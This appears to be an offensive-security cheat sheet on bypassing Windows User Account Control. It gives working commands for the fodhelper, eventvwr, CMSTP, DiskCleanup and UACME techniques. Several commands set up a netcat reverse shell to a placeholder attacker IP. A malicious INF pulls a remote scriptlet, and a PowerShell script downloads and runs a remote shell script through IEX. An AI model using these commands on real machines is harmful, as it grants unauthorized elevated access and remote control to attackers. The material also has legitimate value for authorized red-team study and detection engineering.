Overview
UAC (User Account Control) prompts for elevation. If the user is in the local Administrators group but running in a medium-integrity context, UAC bypass escalates to high integrity without the prompt.
Check UAC Status
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
| ConsentPromptBehaviorAdmin | Meaning |
|---|
0 | Elevate without prompting |
1 | Prompt for credentials on the secure desktop |
2 | Prompt for consent on the secure desktop |
4 | Prompt for consent |
5 | Default — prompt for consent for non-Windows binaries |
Check Current Integrity Level
whoami /groups | findstr "Label"
| Label | Level |
|---|
Medium Mandatory Level | Standard — UAC bypass needed |
High Mandatory Level | Already elevated |
fodhelper.exe
Auto-elevates. Reads a registry key we can control.
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
Cleanup:
reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
eventvwr.exe
Similar to fodhelper — abuses mmc.exe auto-elevation.
reg add HKCU\Software\Classes\mscfile\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
eventvwr.exe
Cleanup:
reg delete HKCU\Software\Classes\mscfile\Shell\Open\command /f
CMSTP.exe
Connection Manager Profile Installer. Loads INF file that executes commands.
Create Malicious INF
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://ATTACKER_IP/payload.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Bypass"
ShortSvcName="Bypass"
Execute
cmstp.exe /ni /s malicious.inf
DiskCleanup (schtasks)
Environment variable windir hijack.
set windir=C:\Windows\Temp & schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Place payload at:
C:\Windows\Temp\System32\cleanmgr.exe
UACME — Automated Bypass
Collection of 70+ UAC bypass methods.
https://github.com/hfiref0x/UACME
Usage
Akagi64.exe <method_number> "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
Common methods:
| # | Technique | Works on |
|---|
| 23 | pkgmgr | Windows 10 |
| 33 | fodhelper | Windows 10/11 |
| 34 | DiskCleanup | Windows 10 |
| 41 | CMSTP | Windows 10 |
| 61 | slui / changepk registry hijack | Windows 10/11 |
| 78 | SSPI datagram | Windows 10/11 |
PowerShell Script (fodhelper)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
UAC bypass only works if user is already in Administrators group. It escalates from medium to high integrity, not from standard user to admin.